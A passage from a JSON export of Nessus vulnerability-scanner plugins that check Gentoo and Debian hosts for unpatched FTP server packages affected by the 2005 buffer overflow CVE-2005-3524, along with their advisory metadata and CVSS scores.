script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/15\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-ftp/netkit-ftpd\", unaffected:make_list(\"ge 0.17-r3\"), vulnerable:make_list(\"lt 0.17-r3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-ftpd-ssl\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:03:39", "description": "A buffer overflow has been discovered in ftpd-ssl, a simple BSD FTP\nserver with SSL encryption support, that could lead to the execution\nof arbitrary code.", "edition": 25, "published": "2006-10-14T00:00:00", "title": "Debian DSA-896-1 : linux-ftpd-ssl - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3524"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", 
"p-cpe:/a:debian:debian_linux:linux-ftpd-ssl"], "id": "DEBIAN_DSA-896.NASL", "href": "https://www.tenable.com/plugins/nessus/22762", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-896. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22762);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-3524\");\n script_xref(name:\"DSA\", value:\"896\");\n\n script_name(english:\"Debian DSA-896-1 : linux-ftpd-ssl - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow has been discovered in ftpd-ssl, a simple BSD FTP\nserver with SSL encryption support, that could lead to the execution\nof arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=339074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-896\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ftpd-ssl package.\n\nThe old stable distribution (woody) does not contain linux-ftpd-ssl\npackages.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 0.17.18+0.3-3sarge1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-ftpd-ssl\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"ftpd-ssl\", reference:\"0.17.18+0.3-3sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}